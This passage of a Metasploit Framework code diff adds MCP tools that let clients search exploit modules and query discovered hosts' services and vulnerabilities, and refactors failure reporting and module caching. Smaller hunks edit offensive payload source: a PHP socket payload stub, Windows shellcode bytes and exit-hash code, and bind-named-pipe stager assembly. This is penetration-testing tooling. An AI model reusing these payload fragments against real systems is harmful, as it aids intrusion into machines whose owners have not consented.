      # Maybe adding specific fields for type, platform, cve, etc.
      query: {
        type: 'string',
        description: 'Search query (keywords, module names, or CVE IDs)',
        minLength: 1,
        maxLength: 500
      },
      limit: {
        type: 'integer',
        description: 'Maximum number of results to return',
        minimum: Msf::MCP::Security::InputValidator::LIMIT_MIN,
        maximum: Msf::MCP::Security::InputValidator::LIMIT_MAX,
        default: Msf::MCP::Security::InputValidator::LIMIT_DEFAULT
      },
      offset: {
        type: 'integer',
        description: 'Number of results to skip (for pagination)',
        minimum: 0,
        default: 0
      }
    },
    required: [:query]
  )
  # Structured result: a metadata envelope plus an array of module summaries.
  output_schema(
    properties: {
      metadata: {
        properties: {
          query: { type: 'string' },
          query_time: { type: 'number' },
          total_items: { type: 'integer' },
          returned_items: { type: 'integer' },
          limit: { type: 'integer' },
          offset: { type: 'integer' }
        }
      },
      data: {
        type: 'array',
        items: {
          properties: {
            fullname: { type: 'string' },
            type: { type: 'string' },
            name: { type: 'string' },
            rank: { type: 'string' },
            disclosure_date: { type: 'string' }
          }
        }
      }
    },
    required: [:metadata, :data]
  )
  # Read-only framework search: safe to repeat, modifies nothing.
  annotations(
    read_only_hint: true,
    idempotent_hint: true,
    destructive_hint: false
  )
  meta({ source: 'metasploit_framework' })
  class << self
    include ToolHelper
    ##
    # Search the framework's module database.
    #
    # @param query [String] Search query
    # @param limit [Integer] Maximum results (default: 100)
    # @param offset [Integer] Results offset (default: 0)
    # @param server_context [Hash] Server context with msf_client, rate_limiter, config
    # @return [MCP::Tool::Response] Structured response with search results
    #
    def call(query:, limit: Msf::MCP::Security::InputValidator::LIMIT_DEFAULT, offset: 0, server_context:)
      started_at = Time.now
      client = server_context[:msf_client]
      # Enforce the per-tool rate limit before doing any work.
      server_context[:rate_limiter].check_rate_limit!('search_modules')

      # Reject malformed input before touching the Metasploit API.
      Msf::MCP::Security::InputValidator.validate_search_query!(query)
      Msf::MCP::Security::InputValidator.validate_pagination!(limit, offset)

      matches = Metasploit::ResponseTransformer.transform_modules(client.search_modules(query))

      # Pagination is applied locally rather than via the API: fetching the
      # full set is what lets us report an accurate total_items count.
      page = matches[offset, limit] || []

      payload = {
        metadata: {
          query: query,
          query_time: (Time.now - started_at).round(3),
          total_items: matches.size,
          returned_items: page.size,
          limit: limit,
          offset: offset
        },
        data: page
      }

      # The same payload serves both the text content and structured_content.
      ::MCP::Tool::Response.new(
        [{ type: 'text', text: JSON.generate(payload) }],
        structured_content: payload
      )
    rescue Msf::MCP::Security::RateLimitExceededError => e
      tool_error_response("Rate limit exceeded: #{e.message}")
    rescue Msf::MCP::Metasploit::AuthenticationError => e
      tool_error_response("Authentication failed: #{e.message}")
    rescue Msf::MCP::Metasploit::APIError => e
      tool_error_response("Metasploit API error: #{e.message}")
    rescue Msf::MCP::Security::ValidationError => e
      tool_error_response(e.message)
    end
  end
end
end
end
+197
View File
@@ -0,0 +1,197 @@
# frozen_string_literal: true
module Msf::MCP
module Tools
##
# MCP Tool: Query Metasploit Database Services
#
# Retrieves service information from the Metasploit database including
# ports, protocols, and service banners.
#
class ServiceInfo < ::MCP::Tool
  tool_name 'msf_service_info'
  description 'Query Metasploit database for discovered services. '\
    'Returns service information including ports, protocols, and banners.'
  # `workspace` carries a default, so it is intentionally NOT listed as
  # required: a required property that also declares a default is
  # contradictory (the default can never apply) and forced clients to send
  # it anyway. This also matches the host-info tool, where workspace is
  # optional.
  input_schema(
    properties: {
      workspace: {
        type: 'string',
        description: 'Workspace name (default: "default")',
        default: 'default'
      },
      names: {
        type: 'string',
        description: 'Comma-separated service names to filter (e.g., "http,https,ssh")'
      },
      host: {
        type: 'string',
        description: 'Host IP address (e.g., "192.168.1.100")'
      },
      ports: {
        type: 'string',
        description: 'Port number or range to filter (e.g., "80" or "80-443")'
      },
      protocol: {
        type: 'string',
        description: 'Protocol to filter (tcp or udp)',
        enum: ['tcp', 'udp']
      },
      only_up: {
        type: 'boolean',
        description: 'Filter to only return services on hosts that are up',
        default: false
      },
      limit: {
        type: 'integer',
        description: 'Maximum number of results',
        minimum: Msf::MCP::Security::InputValidator::LIMIT_MIN,
        maximum: Msf::MCP::Security::InputValidator::LIMIT_MAX,
        default: Msf::MCP::Security::InputValidator::LIMIT_DEFAULT
      },
      offset: {
        type: 'integer',
        description: 'Number of results to skip',
        minimum: 0,
        default: 0
      }
    }
  )
  # Structured result: metadata envelope plus an array of service records.
  output_schema(
    properties: {
      metadata: {
        properties: {
          workspace: { type: 'string' },
          query_time: { type: 'number' },
          total_items: { type: 'integer' },
          returned_items: { type: 'integer' },
          limit: { type: 'integer' },
          offset: { type: 'integer' }
        }
      },
      data: {
        type: 'array',
        items: {
          properties: {
            host_address: { type: 'string' },
            created_at: { type: 'string' },
            updated_at: { type: 'string' },
            port: { type: 'integer' },
            protocol: { type: 'string' },
            state: { type: 'string' },
            name: { type: 'string' },
            info: { type: 'string' }
          }
        }
      }
    },
    required: [:metadata, :data]
  )
  # Read-only database query: safe to repeat, modifies nothing.
  annotations(
    read_only_hint: true,
    idempotent_hint: true,
    destructive_hint: false
  )
  meta({ source: 'metasploit_database' })
  class << self
    include ToolHelper
    ##
    # Execute service query
    #
    # @param workspace [String] Workspace name (default: 'default')
    # @param names [String, nil] Comma-separated service names to filter
    # @param ports [String, nil] Port number or range to filter
    # @param host [String, nil] Host IP address
    # @param protocol [String, nil] Protocol to filter (tcp or udp)
    # @param only_up [Boolean] Filter to only return services on hosts that are up
    # @param limit [Integer] Maximum results (default: 100)
    # @param offset [Integer] Results offset (default: 0)
    # @param server_context [Hash] Server context with msf_client, rate_limiter, config
    # @return [MCP::Tool::Response] Structured response with service information
    #
    def call(workspace: 'default', names: nil, ports: nil, host: nil, protocol: nil, only_up: false, limit: Msf::MCP::Security::InputValidator::LIMIT_DEFAULT, offset: 0, server_context:)
      start_time = Time.now
      # Extract dependencies from server context
      msf_client = server_context[:msf_client]
      rate_limiter = server_context[:rate_limiter]
      # Check rate limit
      rate_limiter.check_rate_limit!('service_info')
      # Validate inputs
      Msf::MCP::Security::InputValidator.validate_pagination!(limit, offset)
      Msf::MCP::Security::InputValidator.validate_only_up!(only_up)
      Msf::MCP::Security::InputValidator.validate_protocol!(protocol) if protocol
      Msf::MCP::Security::InputValidator.validate_ip_address!(host) if host
      Msf::MCP::Security::InputValidator.validate_port_range!(ports) if ports
      # Call Metasploit API
      # Note that `workspace` is optional in the MSF API, the default workspace is used if not provided.
      # The default value is sent anyway for clarity.
      options = { workspace: workspace }
      options[:only_up] = only_up if only_up
      options[:proto] = protocol if protocol
      # The API is misleading, it only supports a single address filter, not multiple.
      options[:addresses] = host if host
      options[:ports] = ports if ports
      options[:names] = names if names
      raw_services = msf_client.db_services(options)
      # Transform response
      transformed = Metasploit::ResponseTransformer.transform_services(raw_services)
      # Apply pagination
      #
      # Note that to get the total number of entries, we gather the entire data set and apply pagination here
      # instead of sending the limit and offset to the API call to be processed by MSF.
      # This is needed to provide accurate total_items count in the metadata.
      total_items = transformed.size
      paginated_data = transformed[offset, limit] || []
      # Build metadata
      metadata = {
        workspace: workspace,
        query_time: (Time.now - start_time).round(3),
        total_items: total_items,
        returned_items: paginated_data.size,
        limit: limit,
        offset: offset
      }
      # Return MCP response
      ::MCP::Tool::Response.new(
        [
          {
            type: 'text',
            text: JSON.generate(
              metadata: metadata,
              data: paginated_data
            )
          }
        ],
        structured_content: {
          metadata: metadata,
          data: paginated_data
        }
      )
    rescue Msf::MCP::Security::RateLimitExceededError => e
      tool_error_response("Rate limit exceeded: #{e.message}")
    rescue Msf::MCP::Metasploit::AuthenticationError => e
      tool_error_response("Authentication failed: #{e.message}")
    rescue Msf::MCP::Metasploit::APIError => e
      tool_error_response("Metasploit API error: #{e.message}")
    rescue Msf::MCP::Security::ValidationError => e
      tool_error_response(e.message)
    end
  end
end
end
end
+27
View File
@@ -0,0 +1,27 @@
# frozen_string_literal: true
module Msf::MCP
module Tools
##
# Shared helper methods for MCP tools.
#
# Provides a standard way to build error responses that comply with the
# MCP protocol, returning a normal result with `isError: true` instead
# of raising exceptions that the MCP server would wrap as internal errors.
#
module ToolHelper
  ##
  # Build a protocol-level error response.
  #
  # Returning a response flagged as an error keeps failures inside the MCP
  # result channel, rather than raising an exception that the server would
  # surface as an internal error.
  #
  # @param message [String] human-readable error description
  # @return [::MCP::Tool::Response] response carrying the isError flag
  #
  def tool_error_response(message)
    error_content = [{ type: 'text', text: message }]
    ::MCP::Tool::Response.new(error_content, error: true)
  end
end
end
end
@@ -0,0 +1,189 @@
# frozen_string_literal: true
module Msf::MCP
module Tools
##
# MCP Tool: Query Metasploit Database Vulnerabilities
#
# Retrieves vulnerability information from the Metasploit database including
# CVE IDs, affected hosts, and vulnerability details.
#
class VulnerabilityInfo < ::MCP::Tool
  tool_name 'msf_vulnerability_info'
  description 'Query Metasploit database for discovered vulnerabilities. '\
    'Returns vulnerability information including CVE IDs and affected hosts.'
  # `workspace` carries a default, so it is intentionally NOT listed as
  # required: a required property that also declares a default is
  # contradictory (the default can never apply) and forced clients to send
  # it anyway. This also matches the host-info tool, where workspace is
  # optional.
  input_schema(
    properties: {
      workspace: {
        type: 'string',
        description: 'Workspace name (default: "default")',
        default: 'default'
      },
      names: {
        type: 'array',
        # The description belongs on the array itself (it describes the
        # filter), not buried inside the per-item schema where many clients
        # never surface it.
        description: 'Exploit names that reported the vulnerability. Each entry needs to be the exact module name, case sensitive, not the path (e.g. "SSH User Code Execution" or "WebEx Local Service Permissions Exploit").',
        items: { type: 'string' }
      },
      host: {
        type: 'string',
        description: 'Host IP address to filter (e.g., "192.168.1.100")'
      },
      ports: {
        type: 'string',
        description: 'Port number or range to filter (e.g., "80" or "80-443")'
      },
      protocol: {
        type: 'string',
        description: 'Protocol to filter (tcp or udp)',
        enum: ['tcp', 'udp']
      },
      limit: {
        type: 'integer',
        description: 'Maximum number of results',
        minimum: Msf::MCP::Security::InputValidator::LIMIT_MIN,
        maximum: Msf::MCP::Security::InputValidator::LIMIT_MAX,
        default: Msf::MCP::Security::InputValidator::LIMIT_DEFAULT
      },
      offset: {
        type: 'integer',
        description: 'Number of results to skip',
        minimum: 0,
        default: 0
      }
    }
  )
  # Structured result: metadata envelope plus an array of vulnerability records.
  output_schema(
    properties: {
      metadata: {
        properties: {
          workspace: { type: 'string' },
          query_time: { type: 'number' },
          total_items: { type: 'integer' },
          returned_items: { type: 'integer' },
          limit: { type: 'integer' },
          offset: { type: 'integer' }
        }
      },
      data: {
        type: 'array',
        items: {
          properties: {
            host: { type: 'string' },
            port: { type: 'integer' },
            protocol: { type: 'string' },
            name: { type: 'string' },
            references: { type: 'array', items: { type: 'string' } },
            created_at: { type: 'string' }
          }
        }
      }
    },
    required: [:metadata, :data]
  )
  # Read-only database query: safe to repeat, modifies nothing.
  annotations(
    read_only_hint: true,
    idempotent_hint: true,
    destructive_hint: false
  )
  meta({ source: 'metasploit_database' })
  class << self
    include ToolHelper
    ##
    # Execute vulnerability query
    #
    # @param workspace [String] Workspace name (default: 'default')
    # @param host [String, nil] Host IP address to filter
    # @param names [Array<String>, nil] Exploit names to filter
    # @param ports [String, nil] Port or port range to filter
    # @param protocol [String, nil] Protocol to filter (tcp or udp)
    # @param limit [Integer] Maximum results (default: 100)
    # @param offset [Integer] Results offset (default: 0)
    # @param server_context [Hash] Server context with msf_client, rate_limiter, config
    # @return [MCP::Tool::Response] Structured response with vulnerability information
    #
    def call(workspace: 'default', host: nil, names: nil, ports: nil, protocol: nil, limit: Msf::MCP::Security::InputValidator::LIMIT_DEFAULT, offset: 0, server_context:)
      start_time = Time.now
      # Extract dependencies from server context
      msf_client = server_context[:msf_client]
      rate_limiter = server_context[:rate_limiter]
      # Check rate limit
      rate_limiter.check_rate_limit!('vulnerability_info')
      # Validate inputs
      Msf::MCP::Security::InputValidator.validate_pagination!(limit, offset)
      Msf::MCP::Security::InputValidator.validate_protocol!(protocol) if protocol
      Msf::MCP::Security::InputValidator.validate_ip_address!(host) if host
      Msf::MCP::Security::InputValidator.validate_port_range!(ports) if ports
      # Call Metasploit API
      # Note that `workspace` is optional in the MSF API, the default workspace is used if not provided.
      # The default value is sent anyway for clarity.
      options = { workspace: workspace }
      options[:address] = host if host
      # The API expects a comma-separated string; `is_a?(Array)` already
      # rejects nil, so no separate nil check is needed.
      options[:names] = names.join(',') if names.is_a?(Array) && names.any?
      options[:ports] = ports if ports
      options[:proto] = protocol if protocol
      raw_vulns = msf_client.db_vulns(options)
      # Transform response
      transformed = Metasploit::ResponseTransformer.transform_vulns(raw_vulns)
      # Apply pagination
      #
      # Note that to get the total number of entries, we gather the entire data set and apply pagination here
      # instead of sending the limit and offset to the API call to be processed by MSF.
      # This is needed to provide accurate total_items count in the metadata.
      total_items = transformed.size
      paginated_data = transformed[offset, limit] || []
      # Build metadata
      metadata = {
        workspace: workspace,
        query_time: (Time.now - start_time).round(3),
        total_items: total_items,
        returned_items: paginated_data.size,
        limit: limit,
        offset: offset
      }
      # Return MCP response
      ::MCP::Tool::Response.new(
        [
          {
            type: 'text',
            text: JSON.generate(
              metadata: metadata,
              data: paginated_data
            )
          }
        ],
        structured_content: {
          metadata: metadata,
          data: paginated_data
        }
      )
    rescue Msf::MCP::Security::RateLimitExceededError => e
      tool_error_response("Rate limit exceeded: #{e.message}")
    rescue Msf::MCP::Metasploit::AuthenticationError => e
      tool_error_response("Authentication failed: #{e.message}")
    rescue Msf::MCP::Metasploit::APIError => e
      tool_error_response("Metasploit API error: #{e.message}")
    rescue Msf::MCP::Security::ValidationError => e
      tool_error_response(e.message)
    end
  end
end
end
end
+128 -1
View File
@@ -39,6 +39,23 @@ module Msf::Module::Failure
# The exploit was interrupted by the user
UserInterrupt = 'user-interrupt'
# Map a {Msf::Exploit::CheckCode} to the corresponding fail_reason constant.
#
# @param check_code [Msf::Exploit::CheckCode]
# @return [String, nil] a Failure constant, or nil if unmapped
def self.fail_reason_from_check_code(check_code)
  # Anything that cannot report a #code (nil, bare symbols) is unmappable.
  return nil unless check_code.respond_to?(:code)
  # Compare by the underlying code value rather than CheckCode identity, so
  # equivalent instances with different detail strings still match.
  case check_code.code
  when Msf::Exploit::CheckCode::Vulnerable.code, Msf::Exploit::CheckCode::Appears.code
    # Positive check results map to None (presumably the 'none' fail reason
    # constant defined above — confirm against the full constant list).
    None
  when Msf::Exploit::CheckCode::Safe.code
    NotVulnerable
  when Msf::Exploit::CheckCode::Detected.code, Msf::Exploit::CheckCode::Unknown.code
    Unknown
  # Any other code (e.g. Unsupported) falls through: the case yields nil,
  # matching the documented "nil if unmapped" contract.
  end
end
def report_failure
return unless framework.db and framework.db.active
@@ -55,6 +72,14 @@ module Msf::Module::Failure
}
info[:target_name] = self.target.name if self.respond_to?(:target)
# Enrich attempt data with check result details when available
if self.respond_to?(:check_code) && self.check_code.is_a?(Msf::Exploit::CheckCode)
info[:check_code] = self.check_code.code
info[:check_detail] = self.check_code.reason || self.check_code.message
mapped_reason = Msf::Module::Failure.fail_reason_from_check_code(self.check_code)
info[:fail_reason] = mapped_reason if mapped_reason
end
if self.datastore['RHOST'] && (self.options['RHOST'] || self.options['RHOSTS'])
# Only include RHOST if it's a single valid host, not a multi-value string or file path
rhost = self.datastore['RHOST'].to_s
@@ -63,15 +88,117 @@ module Msf::Module::Failure
info[:host] = rhost
end
end
if self.datastore['RPORT'] and self.options['RPORT']
info[:port] = self.datastore['RPORT']
if self.class.ancestors.include?(Msf::Exploit::Remote::Tcp)
info[:proto] = 'tcp'
elsif self.class.ancestors.include?(Msf::Exploit::Remote::Udp)
info[:proto] = 'udp'
end
end
# When the check identified a vulnerability, ensure the vuln record exists
# before report_exploit_failure tries to look it up. The UI-level
# check_simple also calls report_vuln, but that happens *after* this
# ensure block, so the vuln wouldn't exist yet for the attempt lookup.
if info[:host] && self.respond_to?(:check_code) &&
self.check_code.is_a?(Msf::Exploit::CheckCode) &&
[Msf::Exploit::CheckCode::Vulnerable, Msf::Exploit::CheckCode::Appears].include?(self.check_code)
vuln_info = if self.check_code == Msf::Exploit::CheckCode::Appears
"Target appears vulnerable based on check of #{self.fullname}."
else
"Vulnerability confirmed by check of #{self.fullname}."
end
vuln_opts = {
workspace: info[:workspace],
host: info[:host],
name: self.name,
refs: self.references,
info: vuln_info
}
# Include port so that checks against different ports on the same
# host create distinct vuln records instead of collapsing into one.
vuln_opts[:port] = info[:port] if info[:port]
vuln_opts[:proto] = info[:proto] if info[:proto]
framework.db.report_vuln(vuln_opts)
end
# Skip creating a duplicate vuln attempt if one was already recorded
# during this run (e.g. by Auxiliary::Report#report_vuln). When a
# check_code is available, update the existing attempt so it carries the
# check result details (the attempt created by report_vuln may not have
# had the check_code yet because it runs before job_run_proc stores it).
if self.respond_to?(:last_vuln_attempt) && self.last_vuln_attempt
if self.respond_to?(:check_code) && self.check_code.is_a?(Msf::Exploit::CheckCode)
_enrich_existing_vuln_attempt(info, self.last_vuln_attempt)
end
info[:skip_vuln_attempt] = true
end
framework.db.report_exploit_failure(info)
end
private
# Update the VulnAttempt for this module/host with check code details that
# were not available when report_vuln originally created it.
#
# @param info [Hash] enrichment data built by report_failure
# @param recorded_attempt [Mdm::VulnAttempt, true] the attempt object stored
# by report_vuln, or +true+ if only the flag was propagated (legacy/fallback).
def _enrich_existing_vuln_attempt(info, recorded_attempt = nil)
return unless framework.db&.active
# Use the stored attempt directly when available — avoids a racy
# re-query that could match the wrong row under concurrency.
attempt = recorded_attempt if recorded_attempt.is_a?(::Mdm::VulnAttempt)
# Fallback: re-query if we only have the boolean flag (e.g. propagated
# through a replicant that only forwarded +true+).
if attempt.nil?
host = info[:host]
return unless host
host_obj = if host.is_a?(::Mdm::Host)
host
else
wspace = info[:workspace] || framework.db.find_workspace(workspace)
framework.db.get_host(workspace: wspace, address: host.to_s)
end
return unless host_obj
scope = ::Mdm::VulnAttempt
.joins(:vuln)
.where(module: fullname, vulns: { host_id: host_obj.id })
# Narrow by service attributes when available so we don't match an
# attempt against a different service on the same host (e.g. port 80
# vs 9200, or TCP vs UDP on the same port).
if info[:port]
service_conditions = { port: info[:port] }
service_conditions[:proto] = info[:proto].to_s.downcase if info[:proto]
scope = scope.joins(vuln: :service)
.where(services: service_conditions)
end
attempt = scope.order(attempted_at: :desc).first
end
return unless attempt
updates = {}
updates[:check_code] = info[:check_code] if info[:check_code] && attempt.check_code.blank?
updates[:check_detail] = info[:check_detail] if info[:check_detail] && attempt.check_detail.blank?
mapped_reason = Msf::Module::Failure.fail_reason_from_check_code(check_code)
updates[:fail_reason] = mapped_reason if mapped_reason && attempt.fail_reason == 'Untried'
# Clear the placeholder fail_detail set by report_vuln when we have a
# real check result.
updates[:fail_detail] = nil if updates[:fail_reason] && attempt.fail_detail == 'vulnerability identified'
attempt.update(updates) if updates.any?
rescue ::StandardError => e
elog('Failed to enrich vuln attempt with check code', error: e)
end
end
+6 -4
View File
@@ -177,7 +177,7 @@ module Msf::ModuleManager::Cache
reference_name = module_metadata.ref_name
# Skip cached modules that are not in our allowed load paths
next if allowed_paths.select{|x| path.index(x) == 0}.empty?
next unless allowed_paths.any? { |x| path.start_with?(x) }
parent_path = get_parent_path(path, type)
@@ -207,8 +207,10 @@ module Msf::ModuleManager::Cache
end
def get_parent_path(module_path, type)
# The load path is assumed to be the next level above the type directory
type_dir = File.join('', Mdm::Module::Detail::DIRECTORY_BY_TYPE[type], '')
module_path.split(type_dir)[0..-2].join(type_dir) # TODO: rewrite
# The load path is the directory above the type directory (e.g. everything
# before "/exploits/" in the module's absolute path).
type_dir = "#{File::SEPARATOR}#{Mdm::Module::Detail::DIRECTORY_BY_TYPE[type]}#{File::SEPARATOR}"
idx = module_path.rindex(type_dir)
idx ? module_path[0, idx] : module_path
end
end
+3 -5
View File
@@ -42,15 +42,13 @@ class Msf::Modules::Loader::Directory < Msf::Modules::Loader::Base
next unless ::File.directory?(full_entry_path) && module_manager.type_enabled?(type)
full_entry_pathname = Pathname.new(full_entry_path)
type_dir_prefix = "#{full_entry_path}#{::File::SEPARATOR}"
# Try to load modules from all the files in the supplied path
Rex::Find.find(full_entry_path) do |entry_descendant_path|
if module_path?(entry_descendant_path)
entry_descendant_pathname = Pathname.new(entry_descendant_path)
relative_entry_descendant_pathname = entry_descendant_pathname.relative_path_from(full_entry_pathname)
relative_entry_descendant_path = relative_entry_descendant_pathname.to_s
next if File::basename(relative_entry_descendant_path).start_with?('example')
relative_entry_descendant_path = entry_descendant_path.delete_prefix(type_dir_prefix)
next if ::File.basename(relative_entry_descendant_path).start_with?('example')
# The module_reference_name doesn't have a file extension
module_reference_name = module_reference_name_from_path(relative_entry_descendant_path)
+36 -10
View File
@@ -78,6 +78,9 @@ class Cache
end
end
end
if has_changes
rebuild_type_cache
end
}
if has_changes
update_store
@@ -89,8 +92,8 @@ class Cache
def module_metadata(type)
@mutex.synchronize do
wait_for_load
# TODO: Should probably figure out a way to cache this
@module_metadata_cache.filter_map { |_, metadata| [metadata.ref_name, metadata] if metadata.type == type }.to_h
type_hash = @metadata_type_index[type]
type_hash ? type_hash.dup : {}
end
end
@@ -129,7 +132,9 @@ class Cache
module_metadata.ref_name.eql? module_name
}
return old_cache_size != @module_metadata_cache.size
removed = old_cache_size != @module_metadata_cache.size
rebuild_type_cache if removed
removed
end
def wait_for_load
@@ -141,29 +146,50 @@ class Cache
# Remove all instances of modules pointing to the same path. This prevents stale data hanging
# around when modules are incorrectly typed (eg: Auxiliary that should be Exploit)
had_type_mismatch_deletion = false
@module_metadata_cache.delete_if {|_, module_metadata|
module_metadata.path.eql? metadata_obj.path && module_metadata.type != module_metadata.type
is_stale = module_metadata.path.eql?(metadata_obj.path) && module_metadata.type != metadata_obj.type
had_type_mismatch_deletion = true if is_stale
is_stale
}
@module_metadata_cache[get_cache_key(module_instance)] = metadata_obj
cache_key = get_cache_key(module_instance)
@module_metadata_cache[cache_key] = metadata_obj
if had_type_mismatch_deletion
# Type changed - full rebuild needed since we removed entries from other type buckets
rebuild_type_cache
else
# Common case - just update the single entry in the type index
type_hash = (@metadata_type_index[metadata_obj.type] ||= {})
type_hash[metadata_obj.ref_name] = metadata_obj
end
end
def get_cache_key(module_instance)
key = ''
key << (module_instance.type.nil? ? '' : module_instance.type)
key << '_'
key << module_instance.class.refname
return key
"#{module_instance.type}_#{module_instance.class.refname}"
end
# Rebuild the per-type index from the main cache.
def rebuild_type_cache
by_type = {}
@module_metadata_cache.each_value do |metadata|
type_hash = (by_type[metadata.type] ||= {})
type_hash[metadata.ref_name] = metadata
end
@metadata_type_index = by_type
end
def initialize
super
@mutex = Mutex.new
@module_metadata_cache = {}
@metadata_type_index = {}
@store_loaded = false
@console = Rex::Ui::Text::Output::Stdio.new
@load_thread = Thread.new {
init_store
rebuild_type_cache
@store_loaded = true
}
end
+70 -20
View File
@@ -8,6 +8,63 @@ module Modules
module Metadata
class Obj
# Frozen shared objects to avoid allocating duplicate empty containers
EMPTY_ARRAY = [].freeze
EMPTY_HASH = {}.freeze
# PlatformList cache to avoid re-parsing identical platform strings
@platform_list_cache = {}
class << self
# Deduplicate a string via Ruby's built-in frozen string table (fstring).
# Identical string contents will share a single frozen object in memory,
# reducing heap usage for highly repeated values like type, platform, arch, and author.
# @param str [String, nil] the string to intern
# @return [String, nil] a frozen, deduplicated copy of the string, or nil
def dedup_string(str)
return str unless str.is_a?(String)
-str
end
# Retrieve or build a cached PlatformList for the given platform string.
# @param platform_string [String, nil]
# @return [Msf::Module::PlatformList, nil]
def cached_platform_list(platform_string)
return nil if platform_string.nil?
@platform_list_cache[platform_string] ||= build_platform_list(platform_string)
end
# Deduplicate notes hash keys and string values via the frozen string table.
# Keys like "Stability", "SideEffects", "Reliability" repeat across thousands
# of modules; values like "crash-safe", "ioc-in-logs" repeat hundreds of times.
def dedup_notes(notes)
notes.each_with_object({}) do |(k, v), h|
h[-k] = case v
when Array
v.map { |e| e.is_a?(String) ? -e : e }
when String
-v
else
v
end
end
end
private
def build_platform_list(platform_string)
if platform_string.casecmp?('All')
platforms = ['']
else
platforms = platform_string.split(',')
end
pl = Msf::Module::PlatformList.transform(platforms)
pl.platforms.freeze
pl.freeze
end
end
# @return [Hash]
attr_reader :actions
# @return [String]
@@ -216,7 +273,7 @@ class Obj
def path
if @is_install_path
return ::File.join(Msf::Config.install_root, @path)
return @full_path ||= ::File.join(Msf::Config.install_root, @path)
end
@path
@@ -230,26 +287,31 @@ class Obj
@actions = obj_hash['actions']
@name = obj_hash['name']
@fullname = obj_hash['fullname']
@aliases = obj_hash['aliases'] || []
@aliases = obj_hash['aliases']
@aliases = (@aliases.nil? || @aliases.empty?) ? EMPTY_ARRAY : @aliases
@disclosure_date = obj_hash['disclosure_date'].nil? ? nil : Time.parse(obj_hash['disclosure_date'])
@rank = obj_hash['rank']
@type = obj_hash['type']
@type = Obj.dedup_string(obj_hash['type'])
@description = obj_hash['description']
@author = obj_hash['author'].nil? ? [] : obj_hash['author']
@author = obj_hash['author']
@author = (@author.nil? || @author.empty?) ? EMPTY_ARRAY : @author.map! { |a| Obj.dedup_string(a) }
@references = obj_hash['references']
@platform = obj_hash['platform']
@platform_list = parse_platform_list(@platform)
@arch = obj_hash['arch']
@references = (@references.nil? || @references.empty?) ? EMPTY_ARRAY : @references
@platform = Obj.dedup_string(obj_hash['platform'])
@platform_list = Obj.cached_platform_list(@platform)
@arch = Obj.dedup_string(obj_hash['arch'])
@rport = obj_hash['rport']
@mod_time = Time.parse(obj_hash['mod_time'])
@ref_name = obj_hash['ref_name']
@path = obj_hash['path']
@is_install_path = obj_hash['is_install_path']
@targets = obj_hash['targets']
@targets = (@targets.nil? || @targets.empty?) ? EMPTY_ARRAY : @targets
@check = obj_hash['check'] ? true : false
@post_auth = obj_hash['post_auth']
@default_credential = obj_hash['default_credential']
@notes = obj_hash['notes'].nil? ? {} : obj_hash['notes']
notes = obj_hash['notes']
@notes = (notes.nil? || notes.empty?) ? EMPTY_HASH : Obj.dedup_notes(notes)
@needs_cleanup = obj_hash['needs_cleanup']
@session_types = obj_hash['session_types']
@autofilter_ports = obj_hash['autofilter_ports']
@@ -292,18 +354,6 @@ class Obj
@references = @references.map {|r| r.dup.force_encoding(encoding)}
end
def parse_platform_list(platform_string)
return nil if platform_string.nil?
if platform_string.casecmp?('All')
# empty string represents all platforms in Msf::Module::PlatformList
platforms = ['']
else
platforms = platform_string.split(',')
end
Msf::Module::PlatformList.transform(platforms)
end
end
end
end
-1
View File
@@ -1,5 +1,4 @@
# -*- coding: binary -*-
require 'metasm'
module Msf
+1 -1
View File
@@ -68,7 +68,7 @@ if (!$s && ($f = 'socket_create') && is_callable($f)) {
$s_type = 'socket';
}
if (!$s_type) {
die('no socket funcs');
die('no socket func');
}
if (!$s) { die('no socket'); }
^
+13 -1
View File
@@ -84,7 +84,18 @@ module Msf::Payload::Windows
method = datastore[name]
method = 'thread' if (!method or @@exit_types.include?(method) == false)
raw[offset, 4] = [ @@exit_types[method] ].pack(pack || 'V')
if respond_to?(:block_api_hash)
exit_hash = block_api_hash('kernel32.dll', {
'seh' => 'SetUnhandledExceptionFilter',
'thread' => 'ExitThread',
'process' => 'ExitProcess',
'none' => 'GetLastError'
}[method]).to_i(16)
else
exit_hash = @@exit_types[method]
end
raw[offset, 4] = [ exit_hash ].pack(pack || 'V')
return true
end
@@ -112,6 +123,7 @@ module Msf::Payload::Windows
# data into a buffer which is allocated with VirtualAlloc to avoid running
# out of stack space or NX problems.
# See the source file: /external/source/shellcode/windows/midstager.asm
# TODO: We should update the midstager to use block-api randomization (passing it to metasm, and block api...)
midstager =
"\xfc\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x50\x1c\x8b\x12\x8b" +
"\x72\x20\xad\xad\x4e\x03\x06\x3d\x32\x33\x5f\x32\x0f\x85\xeb\xff" +
+13 -13
View File
@@ -118,7 +118,7 @@ module Payload::Windows::BindNamedPipe
db #{raw_to_db(uuid_raw)} ; lpBuffer
get_uuid_address:
push edi : hPipe
push #{Rex::Text.block_api_hash('kernel32.dll', 'WriteFile')}
push #{block_api_hash('kernel32.dll', 'WriteFile')}
call ebp ; WriteFile(hPipe, lpBuffer, nNumberOfBytesToWrite, lpNumberOfBytesWritten)
^
end
@@ -154,7 +154,7 @@ module Payload::Windows::BindNamedPipe
call get_pipe_name ; lpName
db "#{full_pipe_name}", 0x00
get_pipe_name:
push #{Rex::Text.block_api_hash('kernel32.dll', 'CreateNamedPipeA')}
push #{block_api_hash('kernel32.dll', 'CreateNamedPipeA')}
call ebp ; CreateNamedPipeA(lpName, dwOpenMode, dwPipeMode, nMaxInstances, nOutBufferSize,
; nInBufferSize, nDefaultTimeOut, lpSecurityAttributes)
mov edi, eax ; save hPipe (using sockedi convention)
@@ -171,11 +171,11 @@ module Payload::Windows::BindNamedPipe
connect_pipe:
push 0 ; lpOverlapped
push edi ; hPipe
push #{Rex::Text.block_api_hash('kernel32.dll', 'ConnectNamedPipe')}
push #{block_api_hash('kernel32.dll', 'ConnectNamedPipe')}
call ebp ; ConnectNamedPipe(hPipe, lpOverlapped)
; check for failure
push #{Rex::Text.block_api_hash('kernel32.dll', 'GetLastError')}
push #{block_api_hash('kernel32.dll', 'GetLastError')}
call ebp ; GetLastError()
cmp eax, 0x217 ; looking for ERROR_PIPE_CONNECTED
jz get_stage_size ; success
@@ -184,7 +184,7 @@ module Payload::Windows::BindNamedPipe
; wait before trying again
push #{retry_wait}
push #{Rex::Text.block_api_hash('kernel32.dll', 'Sleep')}
push #{block_api_hash('kernel32.dll', 'Sleep')}
call ebp ; Sleep(millisecs)
jmp connect_pipe
^
@@ -202,7 +202,7 @@ module Payload::Windows::BindNamedPipe
push 0 ; lpMaxCollectionCount
